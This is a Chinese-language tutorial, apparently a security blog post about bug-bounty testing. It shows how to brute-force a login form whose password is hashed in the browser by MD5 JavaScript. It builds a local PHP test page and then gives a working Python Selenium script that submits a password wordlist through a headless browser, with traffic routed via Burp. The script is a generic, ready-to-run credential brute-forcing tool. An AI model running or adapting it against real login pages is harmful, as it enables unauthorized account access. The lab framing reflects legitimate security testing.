python模拟浏览器登录，绕过加密进行爆破

前言

---

挖掘SRC的时候，爆破登录框时，发现密码字段被加密了，不知道加密算法，如果是通过前端JS进行加密的话，往往要通过寻找JS文件了解加密过程。找到加密函数以后又要想办法构造密码字典，我个人感觉有点费时费力。那么有没有一个万能的方法呢？

解决办法：使用python的selenium库来模拟浏览器自动化点击，绕过加密和时间戳

在这之前，我只知道通过python的selenium库模拟浏览器来获取标题。

前期准备：

既然要模拟，那就要先搭建环境：
参照网上的拼凑一下

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>加密测试页面</title>
    <script src="md5.js"></script>
    <script>
        function md5passwd(){
            passwd = document.getElementById("password").value;
            document.getElementById("password").value = hex_md5(passwd);
            return true;            
        }
    </script>
</head>
<form action="login.php" method="post" onsubmit="return md5passwd()">
        <table width="450" border="0" bgcolor="#000000" cellspacing="1" cellpadding="2"><!--cellspacing指相邻单元格之间的间距，cellpadding指控制单元格内部文字与边框的边距-->
        <tbody>
            <tr height="30">
                <td colspan="2" align="center" bgcolor="#CCCCCC"><font size="5">用户登录</font></td>
            </tr>
            <tr height="30">
                <td width="150" align="right" bgcolor="#E6E6E6">用户名</td>
                <td width="300" bgcolor="#E6E6E6">
                    <input type="text" name="username" id="username" maxlength="20" size="15" /></td>
            </tr>
            <tr height="30">
                <td align="right" bgcolor="#E6E6E6">密码</td>
                <td bgcolor="#E6E6E6">
                    <input name="password" type="password" id="password" size="15" maxlength="20" value=""/></td>
            </tr>
            <tr height="30">
                <td align="center" colspan="2" bgcolor="#CCCCCC">
                    <input type="submit" name="submit" id="submit" value="提交" />
                </td>
            </tr>
</form>
<?php
if( isset( $_POST[ 'username' ] ) ) {
    $user = $_POST[ 'username' ];
    $pass = $_POST[ 'password' ];
    echo "username: ",$user;
    echo "<br>";
    echo "password: ",$pass;
    echo "<br>";
    if ($pass == "8a30ec6807f71bc69d096d8e4d501ade" and $user == "admin"){
        echo "login successfully!";
    }else{
        echo "用户名或密码错误";
    }
}
?>

当用户输入的账户密码为：

username：admin
password：admin666

输出：login successfully!

效果如下：

利用代码：

import time
from selenium import webdriver

chrome_driver = r'C:\Program Files (x86)\Google\Chrome\Application\chromedriver.exe'
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument('--headless')  
chrome_options.add_argument('--disable-gpu') 
chrome_options.add_argument('--ignore-certificate-errors')
chrome_options.add_argument('--proxy-server=http://127.0.0.1:8080')

def start_chrome():
    driver = webdriver.Chrome(executable_path=chrome_driver, chrome_options=chrome_options)
    driver.start_client()
    return driver


def find_info(path):
    elms = driver.find_element_by_xpath(path)
    return elms


if __name__ == "__main__":
    url = 'http://192.168.107.136/login.php'
    driver = start_chrome()
    driver.get(url)
    user_path = '/html/body/form/table/tbody/tr[2]/td[2]/input'
    pass_path = '/html/body/form/table/tbody/tr[3]/td[2]/input'
    submit_path = '/html/body/form/table/tbody/tr[4]/td/input'
    with open(r'C:\Users\sws123\Desktop\pass.txt', 'r') as f:
        lines = [line.strip() for line in f.readlines()]
    for line in lines:
        user_xpath = find_info(user_path)
        pass_xpath = find_info(pass_path)
        submit_xpath = find_info(submit_path)
        user_xpath.send_keys('admin')
        time.sleep(1)
        pass_xpath.send_keys(line)
        time.sleep(1)
        submit_xpath.click()
        time.sleep(1)
    driver.quit()

准备好密码字典

打开burp，运行以上代码，查看效果：

我觉得OK

因缺思厅！

参考如下：

---

暴力破解的2个问题